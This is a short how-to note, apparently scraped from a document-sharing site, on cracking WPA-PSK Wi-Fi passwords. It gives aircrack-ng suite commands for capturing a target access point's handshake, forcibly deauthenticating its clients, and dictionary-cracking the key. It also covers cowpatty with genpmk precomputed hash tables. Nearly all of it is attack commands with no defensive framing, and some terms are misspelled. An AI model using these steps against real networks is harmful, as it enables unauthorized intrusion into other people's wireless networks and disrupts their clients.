文档库 最新最全的文档下载
当前位置:文档库 › WPA-PSK-TPIK

WPA-PSK-TPIK

WPA-PSK-TPIK

WPA-psk TRIP and wpa-psk AES

1.airodump-ng –w key –-channel 6 –-bssid AP’s MAC wlan0

2.Aireplay-ng -0 10 –a AP’s MAC wlan0

Or aireplay-ng -0 10 –a AP’s MAC –h client’s mac wlan0 (-0 Deauthenticate) 3.Build a password.txt

Zcat /pentest/password/dictionaries/wordlist.txt.z > password.txt

Cp /pentest/password/distionaries/password.txt /root

4.aircrack-ng –w password.txt key.cap (-w -word ,use dictionary crack)

Cowpatty

Wireshark or Ethereal open key.cap → eapol → save as wpa.cap /root

Cowpatty –f pass.txt –r wpa.cap –s AP’s mac –v (-f dictionary, -v view)

●Make crack faster use HASH tech

Make a password.txt

Cowpatty

Genpmk –f wordlist1.txt –d tableName –s Essidname

Cowpatty -d tableName –r wpa.cap -s Essidname

https://www.wendangku.net/doc/9212619354.html,

https://www.wendangku.net/doc/9212619354.html,/

(Hash table download 33GB)

相关文档